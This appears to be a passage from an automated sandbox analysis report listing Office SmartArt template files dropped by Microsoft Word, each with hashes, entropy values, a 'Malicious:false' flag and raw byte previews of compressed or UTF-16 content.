                                                                                                                                                                                                                                                                                                                                                                          SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):264
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4866056878458096
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6448
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.897260397307811
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                                                                                                                                                                                                                                          MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                                                                                                                                                                                                                                          SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):246
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5039994158393686
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3683
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.772039166640107
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                                                                                                                                                                                                                                          MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):242
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4938093034530917
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4888
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8636569313247335
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                                                                                                                                                                                                                                          MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                                                                                                                                                                                                                                          SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):254
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4845992218379616
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6024
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.886254023824049
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                                                                                                                                                                                                                                          MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                                                                                                                                                                                                                                          SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):238
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.472155835869843
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5151
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.859615916913808
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                                                                                                                                                                                                                                          MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):260
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.494357416502254
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):6193
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.855499268199703
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                                                                                                                                                                                                                                          MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                                                                                                                                                                                                                                          SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):286
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4670546921349774
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
